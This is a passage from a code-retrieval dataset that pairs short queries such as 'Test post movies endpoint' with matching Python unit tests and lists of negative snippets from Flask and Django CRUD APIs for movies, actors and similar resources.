body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(body['message'], 'Movie Successfully deleted.')
|
[
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_delete_valid(self):\n response = self.app.delete('/api/a/actors/Christopher Lloyd')\n self.assertEqual(response.status_code, 200)\n\n response = self.app.delete('/api/a/movies/Blind Date')\n self.assertEqual(response.status_code, 200)",
"def test_delete_invalid(self):\n response = self.app.delete('/api/a/actors/Bryant Collagauazo')\n self.assertEqual(response.status_code, 400)\n\n response = self.app.delete('/api/a/movies/The Life of Bryant Collaguazo')\n self.assertEqual(response.status_code, 400)",
"def delete_movies(request, movie_id, *args, **kwargs):\n try:\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie.delete()\n return Response({'msg': 'Movie deleted.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_api_videos_id_delete(self):\n pass",
"def delete_movies():\n movie_id = int(request.args.get('id', 0))\n\n if not movie_id:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n\n try:\n with terminating_sn() as session:\n MoviesDao.delete_movie_from_db(session, movie_id)\n\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while deleting movie id {} from db\".format(movie_id))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def handle_movie_delete_request(name):\n name = name.replace(\"_\", \" \")\n if name in MOVIES:\n del MOVIES[name]\n return make_response(jsonify(\"Deleted Successfully\"), 201)\n else:\n return make_response(jsonify(\"Movie not in database.\"), 400)",
"def test_delete_index(self):\n index = self.client.get_index(uid=\"movies_uid\")\n response = index.delete()\n assert isinstance(response, object)",
"def test_delete_todo(self):\n response = self.app.delete('/api/v1/todos/1')\n self.assertEqual(response.status_code, 204)",
"def test_user_genre_delete_id_no_jwt(self, test_client, genre_test1):\n genre = GenreModel.query.filter_by(name=\"genre test\").first()\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id))\n res = json.loads(response.data)\n\n assert response.status_code == 401\n assert res['msg'] == \"Missing Authorization Header\"",
"def test_delete_fighter(self):\n res = self.request.delete(\"http://127.0.0.1:8000/fighter/1/\")\n self.assertEqual(res.status_code,status.HTTP_200_OK)",
"def delete(self, request, movie_uuid):\n if not permission_check(request, role='SuperUser'):\n return access_denied()\n response = MovieHandlers().remove_movie(\n movie_uuid)\n return JsonResponse(response, safe=False)",
"def test_user_genre_delete_id_fake_jwt(self, test_client, headers_fake, genre_test1):\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id), headers=headers_fake)\n res = json.loads(response.data)\n\n assert response.status_code == 404\n assert res['status'] == False",
"def test_delete_actors(self):\n response = self.client.delete('/actors/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Actor Successfully deleted.')",
"def test_delete_song(self):\n podcast = add_podcast('Python Daily', 300, 'Dan Bader')\n with self.client:\n response = self.client.delete(\n f'/api/v1/audio/podcast/{podcast.id}/'\n )\n self.assertEqual(response.status_code, 200)\n self.assertTrue(response.json, {'detail': \"deleted\"})\n print(\"\\n=============================================================\")",
"def test_api_can_delete_food(self):\n food = Food.objects.last()\n response = self.client.delete(f'/api/v1/foods/{food.id}')\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)",
"def test_delete_recipe(client):\n resp = client.delete('/recipe/1')\n assert resp.status_code == server.HTTP_METHOD_NOT_ALLOWED",
"def test_delete_dog(self):\n pass",
"def test_delete_actor_director(self):\r\n with self.client as c:\r\n with self.app_context:\r\n c.post(\r\n \"/actors\",\r\n data=json.dumps(self.actor),\r\n headers=TestActorResources.headers_director,\r\n )\r\n results = c.delete(\r\n \"/actors/1\", headers=TestActorResources.headers_director,\r\n )\r\n\r\n data = json.loads(results.data)\r\n\r\n self.assertEqual(data[\"deleted\"], 1)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test post movies endpoint
|
def test_post_movies(self):
body = {
"release_date": "2020/06/11",
"title": "test"
}
response = self.client.post('/movies',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 201)
self.assertEqual(body['movie']['title'], 'test')
|
[
"def test_post_movie(self):\n body = {\"release_date\": \"2020/06/11\"}\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(body['message'], ['title should be a string.'])",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_create_movie_simple_user(client):\n login_simple_user(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 403",
"def test_api_videos_post(self):\n pass",
"def test_createmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:createmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/createmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_patch_movies(self):\n body = {\n \"title\": \"patch\"\n }\n response = self.client.patch('/movies/2',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['movie']['title'], 'patch')",
"def handle_movie_post_request(name):\n name = name.replace(\"_\", \" \")\n if not request.json:\n return make_response(jsonify(\"Bad Request\"), 400)\n if name in MOVIES:\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)\n else:\n return add_to_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT, Movie)",
"def test_add_video(self):\n query_string = [('url', 'url_example')]\n response = self.client.open(\n '/api/video',\n method='POST',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def add_movies():\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not all([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if MoviesDao.movie_exists(session, name):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_PRESENT\n ).return_response()\n\n MoviesDao.add_movie(session, popularity, director, genre_list, imdb_score, name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while writting movie {} to db\".format(name))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def test_requestmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:requestmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/requestmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def create_movies(request, *args, **kwargs):\n movie_serializer_class = MovieSerializer\n serializer = movie_serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n data = serializer.validated_data\n name = data['name']\n director = data['director']\n genre = data['genre']\n genre_objs = []\n for genre_obj in genre:\n if not Genre.objects.filter(name=genre_obj['name']).exists():\n g = Genre.objects.create(name=genre_obj['name'])\n g.save()\n genre_objs.append(g)\n else:\n g = Genre.objects.get(name=genre_obj['name'])\n genre_objs.append(g)\n\n popularity = data['popularity']\n imdb_score = data['imdb_score']\n movie = Movie.objects.create(\n name=name,\n director=director,\n popularity=popularity,\n imdb_score=imdb_score\n )\n movie.save()\n movie.genre.add(*genre_objs)\n return Response({'msg': 'Movie created.'}, status=status.HTTP_201_CREATED)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_post_actors(self):\n body = {\n \"age\": 2,\n \"gender\": \"female\",\n \"name\": \"test\"\n }\n response = self.client.post('/actors',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['actor']['name'], 'test')",
"def test_movie_creation(self):\n\t\tmovie = self.create_movie()\n\t\tself.assertTrue(isinstance(movie, Movie))",
"def test_retrieve_movies_list(self):\n response_message = json.loads(\n self.get_favourite_movies.get_data(\n as_text=True\n )\n )\n\n self.assertEqual(self.get_favourite_movies.status_code, 200)\n \n self.assertEqual('Your movie list has been retrieved successfully',\n response_message['message'],\n msg=\"Movie list has not been retrieved!\"\n )",
"def test_view():\r\n assert Movie_Management.movie_view() == 1",
"def test_api_activities_post(self):\n pass",
"def handle_movie_and_get_request():\n attr_dict = request.args.to_dict()\n # print(attr_dict)\n movies_matching_query = and_get_request_helper(attr_dict, MOVIES, \"movie\")\n return make_response(jsonify(movies_matching_query),\n 200 if len(movies_matching_query) > 0 else 400)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test update movies endpoint
|
def test_patch_movies(self):
body = {
"title": "patch"
}
response = self.client.patch('/movies/2',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 200)
self.assertEqual(body['movie']['title'], 'patch')
|
[
"def test_update_video_watched(self):\n response = self.client.open(\n '/api/video',\n method='PUT')\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def edit_movies():\n movie_id = int(request.args.get('id', 0))\n\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not movie_id or not any([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if not MoviesDao.movie_id_exists(session, movie_id):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_MISSING\n ).return_response()\n\n MoviesDao.edit_movie(session, movie_id, popularity, director, genre_list, imdb_score,\n name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while editing a movie if {} info\".format(movie_id))",
"def update_movies(request, movie_id, *args, **kwargs):\n movie_serializer_class = MovieSerializer\n queryset = Movie.objects.all()\n serializer = movie_serializer_class(data=request.data)\n try:\n serializer.is_valid(raise_exception=True)\n data = serializer.validated_data\n name = data['name']\n director = data['director']\n genre = data['genre']\n popularity = data['popularity']\n imdb_score = data['imdb_score']\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie_obj = movie.first()\n movie_obj.name = name\n movie_obj.director = director\n movie_obj.genre = genre\n movie_obj.popularity = popularity\n movie_obj.imdb_score = imdb_score\n movie.save()\n return Response({'msg': 'Movie updated.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_movie_update(self, name=\"New Movie Name\"):\n\t\tupdated_id = Movie.objects.update(name=name)\n\t\tupdated_movie = Movie.objects.filter(pk=updated_id).first()\n\t\tself.assertTrue(updated_movie.name, name)",
"def test_post_movies(self):\n body = {\n \"release_date\": \"2020/06/11\",\n \"title\": \"test\"\n }\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['movie']['title'], 'test')",
"def handle_movie_put_request(name):\n name = name.replace(\"_\", \" \")\n if (name not in MOVIES) or (not request.json):\n return make_response(jsonify(\"Bad Request\"), 400)\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_put_valid(self):\n data = {'age': 100}\n response = self.app.put('/api/a/actors/Bruce Willis',\n data=json.dumps(data),\n headers=self.headers)\n data = json.loads(response.get_data(as_text=True))\n self.assertEqual(data['age'], 100)\n\n data = {'year': 2005}\n response = self.app.put('/api/a/movies/The First Deadly Sin',\n data=json.dumps(data),\n headers=self.headers)\n data = json.loads(response.get_data(as_text=True))\n self.assertEqual(data['year'], 2005)",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_api_videos_id_put(self):\n pass",
"def test_post_movie(self):\n body = {\"release_date\": \"2020/06/11\"}\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 400)\n self.assertEqual(body['message'], ['title should be a string.'])",
"def test_update_view(self):\n update_data = {'answer': 'updated answer'}\n\n response = self.client.put(self.url, update_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n update_answer = Answer.objects.get(id=self.answer.id)\n self.assertNotEqual(update_answer.answer, self.answer.answer)\n self.assertEqual(update_answer.answer, update_data.get('answer'))\n with self.assertRaises(Answer.DoesNotExist):\n Answer.objects.get(question=self.question, answer=self.answer.answer)\n\n response_json = json.dumps(response.data)\n self.assertIn(str(update_answer.id), response_json)\n self.assertIn(update_answer.answer, response_json)\n self.assertIn(str(update_answer.votes_count), response_json)\n\n response = self.client.put(self.bad_url, update_data, format='json')\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)",
"def update_movie(self, movie_id, title, description, genre, rating):\n movie = Movie(movie_id, title, description, genre, rating)\n self.__repo.update(movie_id, movie)",
"def test_update_restaurant_detail(self):\n url = f\"{self.base_url}/\"\n self.resgister_restaurant()\n user_credentials = {\n 'email': self.data['base_user'][\"email\"],\n 'password': self.data['base_user']['password']\n }\n user = User.objects.get(email=user_credentials['email'])\n user.is_active = True\n user.save()\n update_data = {\n \"name\": \"updated restaurant\",\n \"license_number\": \"lic no. 456\",\n \"secondary_phone_number\": \"0123\",\n \"address\": \"ktm\",\n \"bio\": \"updated bio\"\n }\n\n access_token = get_access_token(user_credentials)\n headers = {\n \"HTTP_AUTHORIZATION\": f\"Bearer {access_token}\"\n }\n response = self.client.put(\n path=url, data=update_data, format=\"json\", **headers)\n self.assertTrue(response.data['status'])\n self.assertTrue(\"restaurant_data\" in response.data)\n self.assertEqual(\n response.data['restaurant_data'][0]['address'],\n update_data['address'])\n self.assertEqual(\n response.data['restaurant_data'][0]['license_number'],\n update_data['license_number'])",
"def test_api_can_update_wallpaper(self):\n wallpaper = Wallpaper.objects.get()\n change_wallpaper = {\n 'title': 'Something new', 'author': 'tester', 'tags': 'rwar,rrw'}\n res = self.client.put(\n reverse('details', kwargs={'pk': wallpaper.id}),\n change_wallpaper, format='json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)",
"def test_update_valid_info(self):\n self.app.post('/api/tour', json=sample_tour)\n new_values = {'destination_country': 'aaa', 'duration_days': 0}\n response = self.app.put('/api/tour/1', json=new_values)\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n\n expected_tour = sample_tour.copy()\n expected_tour.update(new_values)\n expected_tour['tour_id'] = 1\n response = self.app.get('/api/tour/1')\n self.assertEqual(status.HTTP_200_OK, response.status_code)\n self.assertEqual(status.HTTP_200_OK, response.status_code)",
"def test_update_outlet(self):\n sample_id = 1\n url = reverse('v1:outlet-detail', kwargs={'outlet_id': sample_id})\n data = {'name': 'NewNews', 'website': 'news2.com', 'description': ''}\n response = self.client.put(url, data, format='json')\n result = json.loads(response.content.decode('utf-8'))\n expected = Outlet.objects.get(id=sample_id)\n self.assertEqual(result['name'], expected.name)\n self.assertEqual(result['website'], expected.website)\n self.assertEqual(result['description'], expected.description)\n self.assertEqual(response.status_code, status.HTTP_200_OK)",
"def test_api_can_update_genes(self):\n change_genes = {'name': 'Something new'}\n res = self.client.put(\n reverse('details', kwargs={'pk': genes.id}),\n change_genes, format='json'\n )\n self.assertEqual(res.status_code, status.HTTP_200_OK)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test delete movies endpoint with unexisting id
|
def test_delete_movie(self):
response = self.client.delete('/movies/0')
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 404)
self.assertEqual(body['message'], "resource not found")
|
[
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_api_videos_id_delete(self):\n pass",
"def delete_movies(request, movie_id, *args, **kwargs):\n try:\n movie = Movie.objects.filter(id=movie_id)\n if movie.exists():\n movie.delete()\n return Response({'msg': 'Movie deleted.'}, status=status.HTTP_200_OK)\n else:\n return Response({'msg': 'Movie does not exist.'}, status=status.HTTP_400_BAD_REQUEST)\n except Exception as e:\n return Response({'msg': 'Some Execption Occured.', 'Execption': e}, status=status.HTTP_500_INTERNAL_SERVER_ERROR)",
"def test_delete_valid(self):\n response = self.app.delete('/api/a/actors/Christopher Lloyd')\n self.assertEqual(response.status_code, 200)\n\n response = self.app.delete('/api/a/movies/Blind Date')\n self.assertEqual(response.status_code, 200)",
"def test_delete_invalid(self):\n response = self.app.delete('/api/a/actors/Bryant Collagauazo')\n self.assertEqual(response.status_code, 400)\n\n response = self.app.delete('/api/a/movies/The Life of Bryant Collaguazo')\n self.assertEqual(response.status_code, 400)",
"def delete_movies():\n movie_id = int(request.args.get('id', 0))\n\n if not movie_id:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n\n try:\n with terminating_sn() as session:\n MoviesDao.delete_movie_from_db(session, movie_id)\n\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while deleting movie id {} from db\".format(movie_id))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def handle_movie_delete_request(name):\n name = name.replace(\"_\", \" \")\n if name in MOVIES:\n del MOVIES[name]\n return make_response(jsonify(\"Deleted Successfully\"), 201)\n else:\n return make_response(jsonify(\"Movie not in database.\"), 400)",
"def test_user_genre_delete_id_no_jwt(self, test_client, genre_test1):\n genre = GenreModel.query.filter_by(name=\"genre test\").first()\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id))\n res = json.loads(response.data)\n\n assert response.status_code == 401\n assert res['msg'] == \"Missing Authorization Header\"",
"def test_delete_by_id(self, _id):",
"def test_delete_index(self):\n index = self.client.get_index(uid=\"movies_uid\")\n response = index.delete()\n assert isinstance(response, object)",
"def remove_movie(self, movie_id):\n self.__repo.delete(movie_id)",
"def test_user_genre_delete_id_fake_jwt(self, test_client, headers_fake, genre_test1):\n response = test_client.delete(\n \"/api/user/genre/\"+str(genre_test1.genre_id), headers=headers_fake)\n res = json.loads(response.data)\n\n assert response.status_code == 404\n assert res['status'] == False",
"def test_delete_content_with_invalid_id(self):\n response = self.create_content()\n\n # We want to make sure we have one content in the database..\n self.assertEqual(Content.objects.count(), 1)\n response = self.client.delete(reverse('rud_api', args=(10,)))\n self.assertEqual(Content.objects.count(), 1)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)",
"def test_delete_todo(self):\n response = self.app.delete('/api/v1/todos/1')\n self.assertEqual(response.status_code, 204)",
"def test_api_can_delete_food(self):\n food = Food.objects.last()\n response = self.client.delete(f'/api/v1/foods/{food.id}')\n self.assertEquals(response.status_code, status.HTTP_204_NO_CONTENT)",
"def test_delete_absent_instance(self):\r\n response = self.app.delete('/api/person/1')\r\n assert response.status_code == 204",
"def test_404_delete(self):\n res = self.client().delete('/questions/79oq83kljljlk09903284kejflkj')\n\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertTrue(data['message'])",
"def test_delete_fighter(self):\n res = self.request.delete(\"http://127.0.0.1:8000/fighter/1/\")\n self.assertEqual(res.status_code,status.HTTP_200_OK)",
"def test_delete_view(self):\n response = self.client.delete(self.url)\n self.assertEqual(response.status_code, status.HTTP_204_NO_CONTENT)\n with self.assertRaises(Answer.DoesNotExist):\n Answer.objects.get(id=self.answer.id)\n\n response = self.client.delete(self.bad_url)\n self.assertEqual(response.status_code, status.HTTP_404_NOT_FOUND)"
] |
{
"objective": {
"paired": [],
"self": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
Test post movies endpoint without a title
|
def test_post_movie(self):
body = {"release_date": "2020/06/11"}
response = self.client.post('/movies',
content_type='application/json',
data=json.dumps(body))
body = json.loads(response.data.decode())
self.assertEqual(response.status_code, 400)
self.assertEqual(body['message'], ['title should be a string.'])
|
[
"def test_post_movies(self):\n body = {\n \"release_date\": \"2020/06/11\",\n \"title\": \"test\"\n }\n response = self.client.post('/movies',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 201)\n self.assertEqual(body['movie']['title'], 'test')",
"def test_create_movie_simple_user(client):\n login_simple_user(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 403",
"def test_create_movie_superuser(client):\n login_superuser(client)\n\n url = reverse('movies')\n data = {\"name\": \"MyMovie\", \"pub_date\": 2000, \"duration\": 100, \"rating\": 8.8, \"description\": \"\",\n \"categories\": \"Action\"}\n response = client.post(url, data)\n assert response.status_code == 201",
"def test_api_videos_post(self):\n pass",
"def test_delete_movie(self):\n response = self.client.delete('/movies/0')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 404)\n self.assertEqual(body['message'], \"resource not found\")",
"def test_patch_movies(self):\n body = {\n \"title\": \"patch\"\n }\n response = self.client.patch('/movies/2',\n content_type='application/json',\n data=json.dumps(body))\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['movie']['title'], 'patch')",
"def handle_movie_post_request(name):\n name = name.replace(\"_\", \" \")\n if not request.json:\n return make_response(jsonify(\"Bad Request\"), 400)\n if name in MOVIES:\n return update_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT)\n else:\n return add_to_list(MOVIES, name, request.json, MOVIE_JSON_TO_NODE_DICT, Movie)",
"def test_delete_movies(self):\n response = self.client.delete('/movies/1')\n body = json.loads(response.data.decode())\n self.assertEqual(response.status_code, 200)\n self.assertEqual(body['message'], 'Movie Successfully deleted.')",
"def test_createmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:createmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/createmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_get_movies_unauthenticated(client):\n url = reverse('movies')\n response = client.get(url)\n assert response.status_code == 403",
"def test_create_videoobj_invalid(self):\n payload1 = {'name': 'Hello again'}\n payload2 = {'title': ''}\n res = self.client.post(VIDEOS_URL, payload1)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)\n res = self.client.post(VIDEOS_URL, payload2)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)",
"def test_requestmovie_GET(self):\n self.client.login(username='TestUser', password='user1234')\n url = reverse('myapp:requestmovie')\n response = self.client.get(url, follow=True)\n\n # SUCCESS TEST\n self.assertEquals(response.status_code, 200)\n self.assertTemplateUsed(response, 'myapp/requestmovie.html')\n\n # FAIL TEST\n self.assertNotEquals(response.status_code, not 200)",
"def test_search_by_title_no_results(self):\n\n res = self.client().post('/books', json={'search':'The Power of Habits'})\n data = json.loads(res.data)\n\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(data['books'], 0)\n self.assertEqual(data['total_books'], 0)",
"def test_add_video(self):\n query_string = [('url', 'url_example')]\n response = self.client.open(\n '/api/video',\n method='POST',\n query_string=query_string)\n self.assert200(response,\n 'Response body is : ' + response.data.decode('utf-8'))",
"def add_movies():\n try:\n data = json.loads(request.data)\n\n if not data:\n raise MissingFields\n\n popularity, director, genre_list, imdb_score, name = Validator.parse_json(data)\n\n # Add a validation for popularity and imdb_score\n Validator.validate_param(popularity, imdb_score)\n\n if not all([popularity, director, genre_list, imdb_score, name]):\n raise MissingFields\n\n with terminating_sn() as session:\n if MoviesDao.movie_exists(session, name):\n return ResponseMaker(ResponseMaker.RESPONSE_400,\n ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_ENTRY_PRESENT\n ).return_response()\n\n MoviesDao.add_movie(session, popularity, director, genre_list, imdb_score, name)\n return ResponseMaker(ResponseMaker.RESPONSE_200).return_response(\n ResponseMaker.RESPONSE_200_MESSAGE)\n\n except (json.decoder.JSONDecodeError, MissingFields):\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_MISSING_FIELDS).return_response()\n except InputOutOfBounds:\n return ResponseMaker(ResponseMaker.RESPONSE_400, ResponseMaker.RESPONSE_400_MESSAGE,\n ResponseMaker.RESPONSE_400_ERROR_OUT_OF_BOUNDS).return_response()\n except Exception:\n session.rollback()\n LOG.exception(\"Exception occurred while writting movie {} to db\".format(name))\n return ResponseMaker(ResponseMaker.RESPONSE_500).return_response(\n ResponseMaker.RESPONSE_500_MESSAGE)",
"def test_create_hero_without_name(self):\n params = {\n \"hero\": {\n \"name\": \"\",\n \"description\": \"\",\n \"universe\": \"dc\",\n \"imageUrl\": \"https://image.com/img.jpg\",\n }\n }\n response = self.app.post(path=\"/heroes\", json=params)\n self.assertEqual(response.status_code, 500)\n self.assertEqual(\n response.get_json()[\"details\"], \"Bad request, name is required\"\n )",
"def test_post_recipe(client):\n new_title = \"Peking Duck\"\n resp = client.post('/recipe/1', json={'title': new_title})\n assert resp.status_code == server.HTTP_METHOD_NOT_ALLOWED",
"def search_movies(request):\n movie_title = request.data['title']\n search_movie_url = 'https://api.themoviedb.org/3/search/movie?api_key={}&query={}'.format(api_key, movie_title)\n connect = req.urlopen(search_movie_url)\n data = json.loads(connect.read())\n return JsonResponse({'search results': data['results']}, status= status.HTTP_200_OK)",
